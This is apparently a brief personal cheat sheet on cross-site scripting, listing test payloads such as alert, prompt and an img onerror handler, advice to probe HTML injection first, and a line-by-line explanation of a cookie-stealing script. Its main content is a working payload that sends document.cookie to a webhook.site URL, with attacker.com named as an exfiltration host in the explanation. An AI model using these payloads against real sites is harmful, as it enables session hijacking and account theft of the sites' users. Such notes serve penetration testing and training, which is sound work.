XSS

alert(1)  #avoid as often blocked
print()
prompt('hello')

Nothing is sent to server

<script>prompt(1)</script>
<img src=x onerror="prompt(1)">

First check for HTTP Injection

<h1>test1</h1>

Then go for XSS

<script>alert(document.cookie)</script>

<script>var i = new Image; i.src="https://webhook.site/55423ec0-8c07-42cd-8346-1f91cff37e05/?"+document.cookie;</script>

Add /? to the link to make cookie a parameter

var i = new Image;
- Creates a new Image object in JavaScript. This is commonly used to send data to a server without triggering any visible browser behavior.
i.src = ""+ document.cookie;
- Sets the image's source URL to the contents of document.cookie, which is a string containing all the cookies available to the current page.
- Since the URL is empty (""), this won't actually send the cookie anywhere, but if the empty string was replaced with a URL (e.g., http://attacker.com?c=), it would send the cookie to the attacker’s server.

Last updated 4 months ago